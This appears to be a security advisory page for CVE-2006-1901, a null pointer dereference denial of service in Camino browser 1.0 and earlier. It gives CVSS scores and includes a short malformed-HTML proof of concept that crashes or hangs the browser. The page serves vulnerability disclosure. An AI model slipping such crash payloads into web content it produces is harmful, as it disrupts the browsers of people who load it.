Camino Browser HTML Parsing Null Pointer Dereference Denial of Service Vulnerability

2006.04.24

Credit: izimask thehackademy net

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-1901

CWE: CWE-Other

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Partial

Camino Browser HTML Parsing Null Pointer Dereference Denial of Service Vulnerability
______________________
Camino Browser is prone to a denial-of-service condition when parsing certain malformed HTML content. Successful exploitation will cause the browser to fail or hang.
______________________
Mozilla Camino versions 1.0 and prior are prone to this issue.
______________________
Exploit :
<legend>
<kbd>
<object>
<h4>
</object>
</kbd>
______________________
Simon MOREL <izimask (at) thehackademy (dot) net [email concealed]>
http://www.sysdream.com
______________________
greet: Thomas Waldegger -> http://www.securityfocus.com/archive/1/430875

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Camino Browser HTML Parsing Null Pointer Dereference Denial of Service Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.